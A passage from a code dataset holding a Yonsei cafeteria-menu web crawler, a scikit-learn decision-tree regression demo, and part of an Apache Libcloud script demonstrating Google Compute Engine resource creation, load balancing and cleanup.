prices))\n while prices.__len__() < meals.__len__():\n meals.pop()\n type_handler = {\"(아침)\": \"BR\", \"(점심)\": \"LU\", \"(저녁)\": \"DN\"}\n type = type_handler.get(current_meal_time, \"\")\n meal_handler(type=type, meals=meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n current_row += 1\n if current_row == current_rowspan:\n current_row = 0\n\ndef student_crawler():\n page = requests.get(\"https://coop.yonsei.ac.kr:5013/Menu/Student.asp\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n soup.table.tr.extract()\n COLUMN_COUNT = 7\n dates = None\n meals = []\n prices = []\n current_restaurant = \"\"\n trs = soup.find_all(\"tr\")\n isCafeteria = False\n current_rowspan = 2\n current_row = 0\n is_first_row = True\n meal_price_re = re.compile(\"(.*)/(.*)\")\n chinese_meal_type1_re = re.compile(\"(.*)/단품(.*),곱배기(.*)\")\n chinese_meal_type2_re = re.compile(\"(.*)/단품(.*) 곱배기 (.*)\")\n\n for tr in trs:\n if tr.td.attrs.get(\"colspan\") == COLUMN_COUNT.__str__() or tr.td.attrs.get(\"colspan\") == (COLUMN_COUNT - 1).__str__():\n tr.extract()\n continue\n if tr.td.font and tr.td.font.attrs.get(\"color\") == \"#CCFF00\":\n current_restaurant = tr.td.font.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\" \",\"\")\n isCafeteria = not isCafeteria\n dates = [td.font.get_text() for td in tr.find_all(\"td\")[1:COLUMN_COUNT]]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})/\").findall(date)[0].zfill(2)\n day = re.compile(\"/([0-9]{0,2})\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if isCafeteria:\n if current_row == 0:\n meals = [ele.font.get_text() for ele in tr.find_all(\"td\")]\n meals = meals[1:]\n elif current_row == 1:\n prices = [ele.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\" \",\"\") for ele in tr.find_all(\"td\")]\n prices = prices[1:]\n type = \"BR\" if is_first_row else \"\"\n is_first_row = False\n meal_handler(type=type, meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n current_row += 1\n if current_row == current_rowspan:\n current_row = 0\n else:\n for td in tr.find_all(\"td\"):\n meal_price_text = td.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").strip()\n meal_price = None\n is_chinese = False\n if chinese_meal_type1_re.search(meal_price_text):\n meal_price = chinese_meal_type1_re.findall(meal_price_text)[0]\n is_chinese = True\n elif chinese_meal_type2_re.search(meal_price_text):\n meal_price = chinese_meal_type2_re.findall(meal_price_text)[0]\n is_chinese = True\n if is_chinese:\n meals.append([\"%s(단품)\" % meal_price[0], \"%s(곱배기)\" % meal_price[0]])\n prices.append([meal_price[1], meal_price[2]])\n elif meal_price_re.search(meal_price_text):\n meal_price = meal_price_re.findall(meal_price_text)[0]\n meals.append(meal_price[0])\n prices.append(meal_price[1])\n if meals and prices:\n meal_handler(type=\"\", meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n\ndef hankyung_crawler():\n page = requests.get(\"https://coop.yonsei.ac.kr:5013/Menu/Hankyung.asp\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n soup.div.extract()\n COLUMN_COUNT = 7\n trs = soup.find_all(\"tr\")\n dates = None\n current_restaurant = \"한경관(교직원식당)\"\n current_meal_time = \"\"\n current_floor = \"\"\n price_re = re.compile(\"[,0-9]{,}원\")\n meals = [[] for _ in range(COLUMN_COUNT)]\n prices = []\n for tr in trs:\n if tr.td.attrs.get(\"bgcolor\") == \"#99CCCC\":\n current_meal_time = tr.td.font.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n continue\n if int(tr.td.attrs.get(\"colspan\", 1)) > 1:\n tr.extract()\n continue\n if tr.td.attrs.get(\"bgcolor\") == \"#1D8992\":\n dates = [ele.font.get_text() for ele in tr.find_all(\"td\")][1:]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})/\").findall(date)[0].zfill(2)\n day = re.compile(\"/([0-9]{0,2})\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if tr.td.b:\n current_floor == tr.td.b.get_text()\n if price_re.search(tr.find_all(\"td\")[1].font.get_text()):\n prices = [ele.font.get_text() for ele in tr.find_all(\"td\")]\n meals = meals[1:]\n type_handler = {\"중식\": \"LU\", \"석식\": \"DN\"}\n meal_handler(type=type_handler[current_meal_time], meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = [[] for _ in range(COLUMN_COUNT)]\n prices = []\n \n else:\n for index, td in enumerate(tr.find_all(\"td\")):\n if td.font.get_text().replace('\\xa0', ''):\n meals[index].append(td.font.get_text())","repo_name":"beotborry/collegemeals","sub_path":"yonsei/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15894317806","text":"import numpy as np\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\n\n\nrng = np.random.RandomState(1)\n\nx = np.sort(5 * rng.rand(200, 1))\ny = np.sin(x)\ny[rng.randint(0, 200, 10)] += rng.rand()\n\nx_test = np.arange(0.0, 5.0, 0.01).reshape(-1, 1)\n\ntree_regr = tree.DecisionTreeRegressor(max_depth=1)\ntree_regr.fit(x, y)\npred_y = tree_regr.predict(x_test)\n\n\nplt.figure()\nplt.scatter(x, y, s=20, edgecolor=\"black\", c=\"darkorange\", label=\"data\")\nplt.plot(x_test, pred_y, color=\"yellowgreen\", label=\"max_depth=5\", linewidth=2)\nplt.xlabel(\"data\")\nplt.ylabel(\"target\")\nplt.title(\"Decision Tree Regression\")\nplt.legend()\nplt.show()","repo_name":"JoshuaSXA/MachineLearning","sub_path":"sklearn/tree_reg.py","file_name":"tree_reg.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23688011702","text":"import sys\nimport time\nimport os.path\nimport argparse\nimport datetime\n\n# Add parent dir of this file's dir to sys.path (OS-agnostically)\nsys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\n# isort:skip pragma is needed to make sure those imports are not moved above\n# sys.path manipulation code (https://github.com/PyCQA/isort/issues/468)\nfrom libcloud.dns.base import Zone, Record # isort:skip\nfrom libcloud.dns.types import Provider as Provider_dns # isort:skip\nfrom libcloud.common.google import ResourceNotFoundError # isort:skip\nfrom libcloud.compute.types import Provider # isort:skip\nfrom libcloud.dns.providers import get_driver as get_driver_dns # isort:skip\nfrom libcloud.compute.providers import get_driver # isort:skip\nfrom libcloud.loadbalancer.types import Provider as Provider_lb # isort:skip\nfrom libcloud.loadbalancer.providers import get_driver as get_driver_lb # isort:skip\n\ntry:\n import secrets\nexcept ImportError:\n print(\n '\"demos/secrets.py\" not found.\\n\\n'\n \"Please copy secrets.py-dist to secrets.py and update the GCE* \"\n \"values with appropriate authentication information.\\n\"\n \"Additional information about setting these values can be found \"\n \"in the docstring for:\\n\"\n \"libcloud/common/google.py\\n\"\n )\n sys.exit(1)\n\n\n# pylint: disable=no-name-in-module,import-error\nimport urllib.request as url_req\n\n# Maximum number of 1-CPU nodes to allow to run simultaneously\nMAX_NODES = 5\n\n# String that all resource names created by the demo will start with\n# WARNING: Any resource that has a matching name will be destroyed.\nDEMO_BASE_NAME = \"lct\"\n\n# Datacenter to create resources in\nDATACENTER = \"us-central1-f\"\nBACKUP_DATACENTER = \"us-east1-c\"\n\n# Clean up resources at the end (can be set to false in order to\n# inspect resources at the end of the run). Resources will be cleaned\n# at the beginning regardless.\nCLEANUP = True\n\nargs = getattr(secrets, \"GCE_PARAMS\", ())\nkwargs = getattr(secrets, \"GCE_KEYWORD_PARAMS\", {})\n\n# Add datacenter to kwargs for Python 2.5 compatibility\nkwargs = kwargs.copy()\nkwargs[\"datacenter\"] = DATACENTER\n\n\n# ==== HELPER FUNCTIONS ====\ndef get_gce_driver():\n driver = get_driver(Provider.GCE)(*args, **kwargs)\n return driver\n\n\ndef get_gcelb_driver(gce_driver=None):\n # The GCE Load Balancer driver uses the GCE Compute driver for all of its\n # API calls. You can either provide the driver directly, or provide the\n # same authentication information so the LB driver can get its own\n # Compute driver.\n if gce_driver:\n driver = get_driver_lb(Provider_lb.GCE)(gce_driver=gce_driver)\n else:\n driver = get_driver_lb(Provider_lb.GCE)(*args, **kwargs)\n return driver\n\n\ndef get_dns_driver(gce_driver=None):\n # The Google DNS driver uses the GCE Compute driver for all of its\n # API calls. You can either provide the driver directly, or provide the\n # same authentication information so the LB driver can get its own\n # Compute driver.\n if gce_driver:\n driver = get_driver_dns(Provider_dns.GOOGLE)(gce_driver=gce_driver)\n else:\n driver = get_driver_dns(Provider_dns.GOOGLE)(*args, **kwargs)\n return driver\n\n\ndef create_mig(gce, mig_base_name, zone, template, postfix, num_instances=2):\n \"\"\"\n Creates MIG, sets named ports, modifies various text with 'postfix'.\n\n :param gce: An initalized GCE driver.\n :type gce: :class`GCENodeDriver`\n\n :param zone: Zone to create Managed Instance Group in.\n :type zone: :class:`GCEZone` or ``str``\n\n :param template: Instance Template to use in creating MIG.\n :type template: :class:`GCEInstanceTemplate`\n\n :param postfix: string to append to mig name, etc. Example: 'east',\n 'central'\n :type postfix: ``str``\n\n :param num_instances: number of instances to create in MIG. Default is 2.\n :type num_instances: ``int``\n\n :returns: initialized Managed Instance Group.\n :rtype: :class:`GCEInstanceGroupManager`\n \"\"\"\n mig_name = \"{}-{}\".format(mig_base_name, postfix)\n mig = gce.ex_create_instancegroupmanager(\n mig_name,\n zone,\n template,\n num_instances,\n base_instance_name=mig_name,\n description=\"Demo for %s\" % postfix,\n )\n display(' Managed Instance Group [{}] \"{}\" created'.format(postfix.upper(), mig.name))\n display(\n \" ... MIG instances created: %s\"\n % \",\".join([x[\"name\"] for x in mig.list_managed_instances()])\n )\n\n # set the named_ports on the Instance Group.\n named_ports = [{\"name\": \"%s-http\" % DEMO_BASE_NAME, \"port\": 80}]\n mig.set_named_ports(named_ports=named_ports)\n display(\" ... MIG ports set: %s\" % named_ports)\n\n return mig\n\n\ndef display(title, resource_list=[]):\n \"\"\"\n Display a list of resources.\n\n :param title: String to be printed at the heading of the list.\n :type title: ``str``\n\n :param resource_list: List of resources to display\n :type resource_list: Any ``object`` with a C{name} attribute\n \"\"\"\n print(\"=> %s\" % title)\n for item in resource_list:\n if isinstance(item, Record):\n if item.name.startswith(DEMO_BASE_NAME):\n print(\"=> name={}, type={}\".format(item.name, item.type))\n else:\n print(\" name={}, type={}\".format(item.name, item.type))\n elif isinstance(item, Zone):\n if item.domain.startswith(DEMO_BASE_NAME):\n print(\"=> name={}, dnsname={}\".format(item.id, item.domain))\n else:\n print(\" name={}, dnsname={}\".format(item.id, item.domain))\n elif hasattr(item, \"name\"):\n if item.name.startswith(DEMO_BASE_NAME):\n print(\"=> %s\" % item.name)\n else:\n print(\" %s\" % item.name)\n else:\n if item.startswith(DEMO_BASE_NAME):\n print(\"=> %s\" % item)\n else:\n print(\" %s\" % item)\n\n\ndef cleanup_only():\n start_time = datetime.datetime.now()\n display(\"Clean-up start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # == Get Lists of Everything and Display the lists (up to 10) ==\n # These can either just return values for the current datacenter (zone)\n # or for everything.\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n display(\"Nodes:\", all_nodes)\n\n all_addresses = gce.ex_list_addresses(region=\"all\")\n display(\"Addresses:\", all_addresses)\n\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n display(\"Volumes:\", all_volumes)\n\n # This can return everything, but there is a large amount of overlap,\n # so we'll just get the sizes from the current zone.\n sizes = gce.list_sizes()\n display(\"Sizes:\", sizes)\n\n # These are global\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n images = gce.list_images()\n display(\"Images:\", images)\n\n locations = gce.list_locations()\n display(\"Locations:\", locations)\n\n zones = gce.ex_list_zones()\n display(\"Zones:\", zones)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n gfrs = gce.ex_list_forwarding_rules(global_rules=True)\n display(\"Global Forwarding Rules\", gfrs)\n targetproxies = gce.ex_list_targethttpproxies()\n display(\"Target HTTP Proxies\", targetproxies)\n urlmaps = gce.ex_list_urlmaps()\n display(\"URLMaps\", urlmaps)\n bes = gce.ex_list_backendservices()\n display(\"Backend Services\", bes)\n migs = gce.ex_list_instancegroupmanagers(zone=\"all\")\n display(\"Instance Group Managers\", migs)\n its = gce.ex_list_instancetemplates()\n display(\"Instance Templates\", its)\n hcs = gce.ex_list_healthchecks()\n display(\"Health Checks\", hcs)\n\n # == Clean up any old demo resources ==\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n clean_up(\n gce,\n DEMO_BASE_NAME,\n None,\n gfrs + targetproxies + urlmaps + bes + hcs + migs + its,\n )\n\n # == Pause to let cleanup occur and repopulate volume and node lists ==\n if len(migs):\n time.sleep(10)\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n\n clean_up(\n gce,\n DEMO_BASE_NAME,\n all_nodes,\n all_addresses + all_volumes + firewalls + networks + snapshots,\n )\n volumes = gce.list_volumes()\n clean_up(gce, DEMO_BASE_NAME, None, volumes)\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\ndef clean_up(gce, base_name, node_list=None, resource_list=None):\n \"\"\"\n Destroy all resources that have a name beginning with 'base_name'.\n\n :param base_name: String with the first part of the name of resources\n to destroy\n :type base_name: ``str``\n\n :keyword node_list: List of nodes to consider for deletion\n :type node_list: ``list`` of :class:`Node`\n\n :keyword resource_list: List of resources to consider for deletion\n :type resource_list: ``list`` of I{Resource Objects}\n \"\"\"\n if node_list is None:\n node_list = []\n if resource_list is None:\n resource_list = []\n # Use ex_destroy_multiple_nodes to destroy nodes\n del_nodes = []\n for node in node_list:\n if node.name.startswith(base_name):\n del_nodes.append(node)\n\n result = gce.ex_destroy_multiple_nodes(del_nodes)\n for i, success in enumerate(result):\n if success:\n display(\" Deleted %s\" % del_nodes[i].name)\n else:\n display(\" Failed to delete %s\" % del_nodes[i].name)\n\n # Destroy everything else with just the destroy method\n for resrc in resource_list:\n if resrc.name.startswith(base_name):\n try:\n resrc.destroy()\n class_name = resrc.__class__.__name__\n display(\" Deleted {} ({})\".format(resrc.name, class_name))\n except ResourceNotFoundError:\n display(\" Not found: {} ({})\".format(resrc.name, resrc.__class__.__name__))\n except Exception:\n class_name = resrc.__class__.__name__\n display(\" Failed to Delete {} ({})\".format(resrc.name, class_name))\n raise\n\n\ndef main_compute():\n start_time = datetime.datetime.now()\n display(\"Compute demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # == Get Lists of Everything and Display the lists (up to 10) ==\n # These can either just return values for the current datacenter (zone)\n # or for everything.\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n display(\"Nodes:\", all_nodes)\n\n all_addresses = gce.ex_list_addresses(region=\"all\")\n display(\"Addresses:\", all_addresses)\n\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n display(\"Volumes:\", all_volumes)\n\n # This can return everything, but there is a large amount of overlap,\n # so we'll just get the sizes from the current zone.\n sizes = gce.list_sizes()\n display(\"Sizes:\", sizes)\n\n # These are global\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n subnetworks = gce.ex_list_subnetworks()\n display(\"Subnetworks:\", subnetworks)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n images = gce.list_images()\n display(\"Images:\", images)\n\n locations = gce.list_locations()\n display(\"Locations:\", locations)\n\n zones = gce.ex_list_zones()\n display(\"Zones:\", zones)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n # == Clean up any old demo resources ==\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n # Delete subnetworks first, networks last\n clean_up(gce, DEMO_BASE_NAME, None, subnetworks)\n clean_up(\n gce,\n DEMO_BASE_NAME,\n all_nodes,\n all_addresses + all_volumes + firewalls + snapshots + networks,\n )\n\n # == Create a Legacy Network ==\n display(\"Creating Legacy Network:\")\n name = \"%s-legacy-network\" % DEMO_BASE_NAME\n cidr = \"10.10.0.0/16\"\n network_legacy = gce.ex_create_network(name, cidr)\n display(\" Network %s created\" % name)\n\n # == Delete the Legacy Network ==\n display(\"Delete Legacy Network:\")\n network_legacy.destroy()\n display(\" Network %s delete\" % name)\n\n # == Create an auto network ==\n display(\"Creating Auto Network:\")\n name = \"%s-auto-network\" % DEMO_BASE_NAME\n network_auto = gce.ex_create_network(name, cidr=None, mode=\"auto\")\n display(\" AutoNetwork %s created\" % network_auto.name)\n\n # == Display subnetworks from the auto network ==\n subnets = []\n for sn in network_auto.subnetworks:\n subnets.append(gce.ex_get_subnetwork(sn))\n display(\"Display subnetworks:\", subnets)\n\n # == Delete the auto network ==\n display(\"Delete Auto Network:\")\n network_auto.destroy()\n display(\" AutoNetwork %s deleted\" % name)\n\n # == Create an custom network ==\n display(\"Creating Custom Network:\")\n name = \"%s-custom-network\" % DEMO_BASE_NAME\n network_custom = gce.ex_create_network(name, cidr=None, mode=\"custom\")\n display(\" Custom Network %s created\" % network_custom.name)\n\n # == Create a subnetwork ==\n display(\"Creating Subnetwork:\")\n sname = \"%s-subnetwork\" % DEMO_BASE_NAME\n region = \"us-central1\"\n cidr = \"192.168.17.0/24\"\n subnet = gce.ex_create_subnetwork(sname, cidr, network_custom, region)\n display(\" Subnetwork %s created\" % subnet.name)\n # Refresh object, now that it has a subnet\n network_custom = gce.ex_get_network(name)\n\n # == Display subnetworks from the auto network ==\n subnets = []\n for sn in network_custom.subnetworks:\n subnets.append(gce.ex_get_subnetwork(sn))\n display(\"Display custom subnetworks:\", subnets)\n\n # == Launch instance in custom subnetwork ==\n display(\"Creating Node in custom subnetwork:\")\n name = \"%s-subnet-node\" % DEMO_BASE_NAME\n node_1 = gce.create_node(\n name,\n \"g1-small\",\n \"debian-8\",\n ex_disk_auto_delete=True,\n ex_network=network_custom,\n ex_subnetwork=subnet,\n )\n display(\" Node %s created\" % name)\n\n # == Destroy instance in custom subnetwork ==\n display(\"Destroying Node in custom subnetwork:\")\n node_1.destroy()\n display(\" Node %s destroyed\" % name)\n\n # == Delete an subnetwork ==\n display(\"Delete Custom Subnetwork:\")\n subnet.destroy()\n display(\" Custom Subnetwork %s deleted\" % sname)\n is_deleted = False\n while not is_deleted:\n time.sleep(3)\n try:\n subnet = gce.ex_get_subnetwork(sname, region)\n except ResourceNotFoundError:\n is_deleted = True\n\n # == Delete the auto network ==\n display(\"Delete Custom Network:\")\n network_custom.destroy()\n display(\" Custom Network %s deleted\" % name)\n\n # == Create Node with disk auto-created ==\n if MAX_NODES > 1:\n display(\"Creating a node with boot/local-ssd using GCE structure:\")\n name = \"%s-gstruct\" % DEMO_BASE_NAME\n img_url = \"projects/debian-cloud/global/images/\"\n img_url += \"backports-debian-7-wheezy-v20141205\"\n disk_type_url = \"projects/%s/zones/us-central1-f/\" % project.name\n disk_type_url += \"diskTypes/local-ssd\"\n gce_disk_struct = [\n {\n \"type\": \"PERSISTENT\",\n \"deviceName\": \"%s-gstruct\" % DEMO_BASE_NAME,\n \"initializeParams\": {\n \"diskName\": \"%s-gstruct\" % DEMO_BASE_NAME,\n \"sourceImage\": img_url,\n },\n \"boot\": True,\n \"autoDelete\": True,\n },\n {\n \"type\": \"SCRATCH\",\n \"deviceName\": \"%s-gstruct-lssd\" % DEMO_BASE_NAME,\n \"initializeParams\": {\"diskType\": disk_type_url},\n \"autoDelete\": True,\n },\n ]\n node_gstruct = gce.create_node(\n name,\n \"n1-standard-1\",\n None,\n \"us-central1-f\",\n ex_disks_gce_struct=gce_disk_struct,\n )\n num_disks = len(node_gstruct.extra[\"disks\"])\n display(\" Node %s created with %d disks\" % (node_gstruct.name, num_disks))\n\n display(\"Creating Node with auto-created SSD:\")\n name = \"%s-np-node\" % DEMO_BASE_NAME\n node_1 = gce.create_node(\n name,\n \"n1-standard-1\",\n \"debian-7\",\n ex_tags=[\"libcloud\"],\n ex_disk_type=\"pd-ssd\",\n ex_disk_auto_delete=False,\n )\n display(\" Node %s created\" % name)\n\n # Stop the node and change to a custom machine type (e.g. size)\n display(\"Stopping node, setting custom size, starting node:\")\n name = \"%s-np-node\" % DEMO_BASE_NAME\n gce.ex_stop_node(node_1)\n gce.ex_set_machine_type(node_1, \"custom-2-4096\") # 2 vCPU, 4GB RAM\n gce.ex_start_node(node_1)\n node_1 = gce.ex_get_node(name)\n display(\" {}: state={}, size={}\".format(name, node_1.extra[\"status\"], node_1.size))\n\n # == Create, and attach a disk ==\n display(\"Creating a new disk:\")\n disk_name = \"%s-attach-disk\" % DEMO_BASE_NAME\n volume = gce.create_volume(10, disk_name)\n if gce.attach_volume(node_1, volume, ex_auto_delete=True):\n display(\" Attached {} to {}\".format(volume.name, node_1.name))\n display(\" Disabled auto-delete for {} on {}\".format(volume.name, node_1.name))\n gce.ex_set_volume_auto_delete(volume, node_1, auto_delete=False)\n\n if CLEANUP:\n # == Detach the disk ==\n if gce.detach_volume(volume, ex_node=node_1):\n display(\" Detached {} from {}\".format(volume.name, node_1.name))\n\n # == Create Snapshot ==\n display(\"Creating a snapshot from existing disk:\")\n # Create a disk to snapshot\n vol_name = \"%s-snap-template\" % DEMO_BASE_NAME\n image = gce.ex_get_image(\"debian-7\")\n vol = gce.create_volume(None, vol_name, image=image)\n display(\"Created disk %s to shapshot:\" % DEMO_BASE_NAME)\n # Snapshot volume\n snapshot = vol.snapshot(\"%s-snapshot\" % DEMO_BASE_NAME)\n display(\" Snapshot %s created\" % snapshot.name)\n\n # == Create Node with existing disk ==\n display(\"Creating Node with existing disk:\")\n name = \"%s-persist-node\" % DEMO_BASE_NAME\n # Use objects this time instead of names\n # Get latest Debian 7 image\n image = gce.ex_get_image(\"debian-7\")\n # Get Machine Size\n size = gce.ex_get_size(\"n1-standard-1\")\n # Create Disk from Snapshot created above\n volume_name = \"%s-boot-disk\" % DEMO_BASE_NAME\n volume = gce.create_volume(None, volume_name, snapshot=snapshot)\n display(\" Created %s from snapshot\" % volume.name)\n # Create Node with Disk\n node_2 = gce.create_node(\n name,\n size,\n image,\n ex_tags=[\"libcloud\"],\n ex_boot_disk=volume,\n ex_disk_auto_delete=False,\n )\n display(\" Node {} created with attached disk {}\".format(node_2.name, volume.name))\n\n # == Update Tags for Node ==\n display(\"Updating Tags for %s:\" % node_2.name)\n tags = node_2.extra[\"tags\"]\n tags.append(\"newtag\")\n if gce.ex_set_node_tags(node_2, tags):\n display(\" Tags updated for %s\" % node_2.name)\n check_node = gce.ex_get_node(node_2.name)\n display(\" New tags: %s\" % check_node.extra[\"tags\"])\n\n # == Setting Metadata for Node ==\n display(\"Setting Metadata for %s:\" % node_2.name)\n if gce.ex_set_node_metadata(node_2, {\"foo\": \"bar\", \"baz\": \"foobarbaz\"}):\n display(\" Metadata updated for %s\" % node_2.name)\n check_node = gce.ex_get_node(node_2.name)\n display(\" New Metadata: %s\" % check_node.extra[\"metadata\"])\n\n # == Create Multiple nodes at once ==\n base_name = \"%s-multiple-nodes\" % DEMO_BASE_NAME\n number = MAX_NODES - 2\n if number > 0:\n display(\"Creating Multiple Nodes (%s):\" % number)\n multi_nodes = gce.ex_create_multiple_nodes(\n base_name,\n size,\n image,\n number,\n ex_tags=[\"libcloud\"],\n ex_disk_auto_delete=True,\n )\n for node in multi_nodes:\n display(\" Node %s created\" % node.name)\n\n # == Create a Network ==\n display(\"Creating Network:\")\n name = \"%s-network\" % DEMO_BASE_NAME\n cidr = \"10.10.0.0/16\"\n network_1 = gce.ex_create_network(name, cidr)\n display(\" Network %s created\" % network_1.name)\n\n # == Create a Firewall ==\n display(\"Creating a Firewall:\")\n name = \"%s-firewall\" % DEMO_BASE_NAME\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"3141\"]}]\n firewall_1 = gce.ex_create_firewall(name, allowed, network=network_1, source_tags=[\"libcloud\"])\n display(\" Firewall %s created\" % firewall_1.name)\n\n # == Create a Static Address ==\n display(\"Creating an Address:\")\n name = \"%s-address\" % DEMO_BASE_NAME\n address_1 = gce.ex_create_address(name)\n display(\" Address {} created with IP {}\".format(address_1.name, address_1.address))\n\n # == List Updated Resources in current zone/region ==\n display(\"Updated Resources in current zone/region\")\n nodes = gce.list_nodes()\n display(\"Nodes:\", nodes)\n\n addresses = gce.ex_list_addresses()\n display(\"Addresses:\", addresses)\n\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n subnetworks = gce.ex_list_subnetworks()\n display(\"Subnetworks:\", subnetworks)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n if CLEANUP:\n display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, None, subnetworks)\n clean_up(gce, DEMO_BASE_NAME, nodes, addresses + firewalls + snapshots + networks)\n volumes = gce.list_volumes()\n clean_up(gce, DEMO_BASE_NAME, None, volumes)\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\n# ==== LOAD BALANCER CODE STARTS HERE ====\ndef main_load_balancer():\n start_time = datetime.datetime.now()\n display(\"Load-balancer demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n gcelb = get_gcelb_driver(gce)\n\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # Existing Balancers\n balancers = gcelb.list_balancers()\n display(\"Load Balancers\", balancers)\n\n # Protocols\n protocols = gcelb.list_protocols()\n display(\"Protocols\", protocols)\n\n # Healthchecks\n healthchecks = gcelb.ex_list_healthchecks()\n display(\"Health Checks\", healthchecks)\n\n # This demo is based on the GCE Load Balancing Quickstart described here:\n # https://developers.google.com/compute/docs/load-balancing/lb-quickstart\n\n # == Clean-up and existing demo resources ==\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n firewalls = gce.ex_list_firewalls()\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, all_nodes, balancers + healthchecks + firewalls)\n\n # == Create 3 nodes to balance between ==\n startup_script = (\n \"apt-get -y update && \" \"apt-get -y install apache2 && \" \"hostname > /var/www/index.html\"\n )\n tag = \"%s-www\" % DEMO_BASE_NAME\n base_name = \"%s-www\" % DEMO_BASE_NAME\n image = gce.ex_get_image(\"debian-7\")\n size = gce.ex_get_size(\"n1-standard-1\")\n number = 3\n display(\"Creating %d nodes\" % number)\n metadata = {\"items\": [{\"key\": \"startup-script\", \"value\": startup_script}]}\n lb_nodes = gce.ex_create_multiple_nodes(\n base_name,\n size,\n image,\n number,\n ex_tags=[tag],\n ex_metadata=metadata,\n ex_disk_auto_delete=True,\n ignore_errors=False,\n )\n display(\"Created Nodes\", lb_nodes)\n\n # == Create a Firewall for instances ==\n display(\"Creating a Firewall\")\n name = \"%s-firewall\" % DEMO_BASE_NAME\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"80\"]}]\n firewall = gce.ex_create_firewall(name, allowed, target_tags=[tag])\n display(\" Firewall %s created\" % firewall.name)\n\n # == Create a Health Check ==\n display(\"Creating a HealthCheck\")\n name = \"%s-healthcheck\" % DEMO_BASE_NAME\n\n # These are all the default values, but listed here as an example. To\n # create a healthcheck with the defaults, only name is required.\n hc = gcelb.ex_create_healthcheck(\n name,\n host=None,\n path=\"/\",\n port=\"80\",\n interval=5,\n timeout=5,\n unhealthy_threshold=2,\n healthy_threshold=2,\n )\n display(\"Healthcheck %s created\" % hc.name)\n\n # == Create Load Balancer ==\n display(\"Creating Load Balancer\")\n name = \"%s-lb\" % DEMO_BASE_NAME\n port = 80\n protocol = \"tcp\"\n algorithm = None\n members = lb_nodes[:2] # Only attach the first two initially\n healthchecks = [hc]\n balancer = gcelb.create_balancer(\n name, port, protocol, algorithm, members, ex_healthchecks=healthchecks\n )\n display(\" Load Balancer %s created\" % balancer.name)\n\n # == Attach third Node ==\n display(\"Attaching additional node to Load Balancer\")\n member = balancer.attach_compute_node(lb_nodes[2])\n display(\" Attached {} to {}\".format(member.id, balancer.name))\n\n # == Show Balancer Members ==\n members = balancer.list_members()\n display(\"Load Balancer Members\")\n for member in members:\n display(\" ID: {} IP: {}\".format(member.id, member.ip))\n\n # == Remove a Member ==\n display(\"Removing a Member\")\n detached = members[0]\n detach = balancer.detach_member(detached)\n if detach:\n display(\" Member {} detached from {}\".format(detached.id, balancer.name))\n\n # == Show Updated Balancer Members ==\n members = balancer.list_members()\n display(\"Updated Load Balancer Members\")\n for member in members:\n display(\" ID: {} IP: {}\".format(member.id, member.ip))\n\n # == Reattach Member ==\n display(\"Reattaching Member\")\n member = balancer.attach_member(detached)\n display(\" Member {} attached to 